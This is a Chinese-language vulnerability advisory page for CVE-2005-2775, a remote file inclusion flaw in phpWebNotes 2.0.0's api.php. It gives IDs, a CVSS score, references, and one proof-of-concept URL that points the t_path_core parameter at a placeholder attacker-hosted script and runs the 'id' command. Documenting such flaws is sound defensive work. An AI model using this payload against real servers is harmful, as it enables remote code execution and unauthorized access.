PHPWebNotes Api.PHP 远程文件包含漏洞

PHPWebNotes Api.PHP 远程文件包含漏洞

漏洞ID 1109034 漏洞类型 输入验证
发布时间 2005-08-29 更新时间 2005-10-20
图片[1]-PHPWebNotes Api.PHP 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-2775
图片[2]-PHPWebNotes Api.PHP 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200509-024
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26201
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-024
|漏洞详情
phpWebNotes是一个根据php.net建模的页面注释系统。它的主要目的是提供在线帮助/doc/使用说明页面。这些Web文档最经常的用途是让用户增加页脚注释。phpWebNotes2.0.0版本中的php_api.php文件使用析出函数修改关键变量,如$t_path_core,这导致了PHP文件包含漏洞。远程攻击者可利用该漏洞借助于t_path_core参数执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14679/info

phpWebNotes is prone to a remote file include vulnerability.

hpWebNotes is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id
|参考资料

来源:XF
名称:phpwebnotes-phpapi-file-include(22040)
链接:http://xforce.iss.net/xforce/xfdb/22040
来源:SECTRACK
名称:1014807
链接:http://www.securitytracker.com/alerts/2005/Aug/1014807.html
来源:BID
名称:14679
链接:http://www.securityfocus.com/bid/14679
来源:BUGTRAQ
名称:20050827XSSsecurityholeinphpwebnotes.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112516693300371&w;=2

相关推荐: Imatix Xitami GSL Template Cross Site Scripting Vulnerability

Imatix Xitami GSL Template Cross Site Scripting Vulnerability 漏洞ID 1101921 漏洞类型 Input Validation Error 发布时间 2002-06-14 更新时间 2002-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享